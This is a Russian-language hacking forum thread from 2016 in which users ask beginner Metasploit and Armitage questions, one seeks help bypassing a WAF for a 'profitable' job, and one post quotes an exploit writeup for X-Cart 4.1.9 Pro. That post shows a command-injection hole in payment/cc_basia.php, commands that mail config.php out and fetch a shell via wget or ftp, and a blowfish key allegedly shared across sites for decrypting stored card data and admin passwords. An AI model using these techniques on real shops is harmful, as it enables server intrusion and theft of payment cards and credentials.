HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1371  
Старый 08.09.2016, 14:20
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Смотри просканировал сайт на порты, там много открытых было, там был порт 80 версия программы, я вёл поиск на Apache httpd 2.2.22 ((Debian)) вывело херову тучу я взял самым высоким риском excellent, прописал всё и вёл exploit потом вывело это
И мне интересно я подключился ?
Код:
Code:[*] Started reverse TCP handler on 192.168.1.4:4444[*] Exploit completed, but no session was created.
msf exploit(struts_dev_mode) >
Я подключился к тому серверу или нет ?
Написано же что сеанс не был создан.

Не подключился ты никуда..
 
Ответить с цитированием

  #1372  
Старый 08.09.2016, 16:32
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Как в PentestBox открыть Metasploit Framework не консольно а интерфейсом ?
 
Ответить с цитированием

  #1373  
Старый 08.09.2016, 20:13
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе

Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
 
Ответить с цитированием

  #1374  
Старый 09.09.2016, 08:46
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

кто умеет обходить WAF? Ну или по пытается хотя бы, есть очень хороший прибыльный варик
это плохо?


Погугли обход WAF.Но я думаю,что там не просто нужно использовать стандартные обходы,но и самому конструировать запросы . Кстати это плохо.)
 
Ответить с цитированием

  #1375  
Старый 09.09.2016, 08:47
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
Скачай Armitage .
 
Ответить с цитированием

  #1376  
Старый 09.09.2016, 10:59
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Скачай Armitage .
Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
 
Ответить с цитированием

  #1377  
Старый 09.09.2016, 12:05
EstGi
Guest
Сообщений: n/a
Провел на форуме:
506

Репутация: 0
По умолчанию

подскажите пожалуйста что есть на x-cart 4.1.9 Pro
 
Ответить с цитированием

  #1378  
Старый 09.09.2016, 20:18
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

И не хера не говорят как на винду поставить шикарно
В чём проблема скачай Linux.Пусть будет и Windows,и Linux .
 
Ответить с цитированием

  #1379  
Старый 09.09.2016, 20:27
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от EstGi  
EstGi said:

подскажите пожалуйста что есть на x-cart 4.1.9 Pro
Цитирую:

.SpoilerTarget" type="button">Spoiler
При установке X-Cart требует наличия exec() и выключенного сейфмода для работы скриптов обработки картона. Сам картон и пароли пользователей зашифрованы алгоритмом blowfish и хранятся в БД; ключ blowfish хранится в config.php вместе с настройками для подключения к БД.

После целенаправленного поиска всех вызовов exec(), был обнаружен незащищенный скрипт, который не фильтрует поступающие данные, попадающие в exec().

payment/cc_basia.php:

PHP:

if($REQUEST_METHOD == "POST" && isset($HTTP_POST_VARS["boamsg"]) && empty($HTTP_POST_VARS["boaref"]))

{ x_load('order');

$pp_path = func_query_first_cell("SELECT param02 FROM $sql_tbl[ccprocessors] WHERE processor='cc_basia.php'"); $resp = parse_basia_response($HTTP_POST_VARS["boamsg"]); /* ... */ }

PHP:

function parse_basia_response($resp)

{

global $pp_path; exec(func_shellquote($pp_path)."/decrypt ".$resp." 2>&1";,$out); $resp = $out[0]; /* ... */ }

Вывода exec() получить нельзя, но команды успешно выполняются.

Эксплоит работает в интерактивном режиме, поэтому нужен CLI-интерфейс. Первый параметр URL, второй - режим работы. Всего сделал 4 режима:
[LIST][*]ch/check - проверка доступности exec() через вывод некоторых параметров конфигурации PHP в скрипте check_requirements.php с GET-параметром checkrequirements. В большинстве случаев, если путь указан верно, exec() будет доступен.
[*]e/exec - выполнение команд. Здесь надо отметить, что в команде не допускаются символы, которые могут быть заэкранированы addslashes(). Это также особо не препятствует удачному взлому.
[*]c/config - отправка config.php на email. Эксплоит запросит ваш email и выполнит такую команду:

cat ../config.php | mail $email
[*]u/upload - загрузка файлов с помощью wget. Будут запрошены URL удаленного файла, а также локальный путь для сохранения. Локальный путь нужно указывать относительно папки, где установлен X-Cart. Его можно не указывать, тогда будет использоваться файл skin1/main/error_realtime_shipping_disabled.php. По завершени выполнения команды будет предложено применить touch на созданном файле.

Если файлы не закачиваются, то вероятно wget'а нет или к нему запрещен доступ. Самый верный вариант - заливать с помощью ftp. Для этого запускаем второй режим и выполняем команду:

cd ../skin1/main/; echo user [user] [pass]>ftp.txt; echo prompt>>ftp.txt; echo get s.php>>ftp.txt; echo bye>>ftp.txt; ftp -n -v [host] mdecrypt('06a907f395516c9dfb4489e7de21d50141fabf5b 9b007787', 'bb3704bed294be6d89b840b3fc184039');

blowfish.php - это отредактированный скрипт из поставки X-Cart (см. в атаче); первый аргумент функции это зашифрованное значение, второй - ключ. Кстати на всех сайтах, которые мне попадались - ключ был один и тот же: bb3704bed294be6d89b840b3fc184039. Пароли админов расшифровываются аналогичным способом.
 
Ответить с цитированием

  #1380  
Старый 10.09.2016, 00:22
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
Linux как вторую ОС не вариант поставить ?..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ